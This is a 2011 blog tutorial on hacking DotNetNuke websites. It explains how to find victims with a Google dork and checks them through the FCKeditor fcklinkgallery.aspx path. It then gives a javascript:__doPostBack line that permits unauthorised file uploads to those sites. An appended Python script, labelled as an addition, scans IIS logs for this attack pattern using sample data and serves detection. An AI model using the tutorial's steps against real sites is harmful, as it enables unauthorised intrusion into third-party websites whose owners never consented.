Sunday, May 29, 2011

DNN (DotNetNuke) Website Hacking – Tutorial



This attack is easy compared to other hacking attacks such as SQL injection and cross-site scripting.
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. It mainly provides a content management system (CMS) for personal websites.
Below are the steps to carry out the attack:
• First, use a Google dork to find an appropriate target.
inurl:"/portals/0" site:.com
• You can change com to your desired domain, such as bd, ph or ae.
• Now run the search on Google. You will get many websites; choose any one of them.
• It's time to check for the required vulnerability on the website. Just place this path after the web address.
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• For example, if you got www.victim.com
• Change it to www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you get this screen, the site is vulnerable.
[Screenshot: dnn1]
• Now choose the third option, "A File On Your Site", and then paste this JavaScript into your address bar.
javascript:__doPostBack('ctlURL$cmdUpload','')
• This lets you upload files to the website. You can upload text, swf, jpg, gif and pdf files.
• After uploading, you can find your file at www.victim.com/portals/0/yourfile.extension
where extension is txt, jpg, swf, etc.
• In our case:
www.victim.com/portals/0/b.txt
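
From the site owner's side, the steps above leave a recognisable trail in the web server log: a request for fcklinkgallery.aspx, a POST back to the same page, then a fetch of a file under /portals/. The following is an added example, not part of the original post, that looks for that sequence per client; it assumes IIS W3C logging with the fields shown, and the log lines and IP addresses are constructed sample data.

```python
import re
from collections import defaultdict

GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
PORTAL_FILE = re.compile(r"^/portals/\d+/[^/]+\.(txt|swf|jpg|gif|pdf)$", re.I)

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-05-29 10:00:01 GET /Default.aspx - 198.51.100.7 200
2011-05-29 10:02:11 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2011-05-29 10:02:40 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2011-05-29 10:03:05 GET /portals/0/b.txt - 203.0.113.9 200
2011-05-29 10:04:00 GET /portals/0/logo.jpg - 198.51.100.7 200
2011-05-29 10:05:00 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 192.0.2.44 404
"""

def parse(log_text):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_gallery_abuse(log_text):
    """Return {client_ip: findings} for every client that requested the gallery page."""
    findings = defaultdict(lambda: {"probe": False, "postback": False, "fetched": []})
    for r in parse(log_text):
        ip, path = r["c-ip"], r["cs-uri-stem"]
        ok = r["sc-status"].startswith("2")
        if path.lower() == GALLERY:
            findings[ip]["probe"] = True          # any request counts as a probe
            if r["cs-method"] == "POST" and ok:   # postback accepted by the page
                findings[ip]["postback"] = True
        elif findings.get(ip, {}).get("postback") and ok and PORTAL_FILE.match(path):
            findings[ip]["fetched"].append(path)  # file fetched after the postback
    return dict(findings)

if __name__ == "__main__":
    for ip, f in find_gallery_abuse(SAMPLE_LOG).items():
        print(ip, f)
```

Any client with postback set and paths listed under fetched is a reason to review the contents of the /portals/ directory for files the site owner did not place there.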
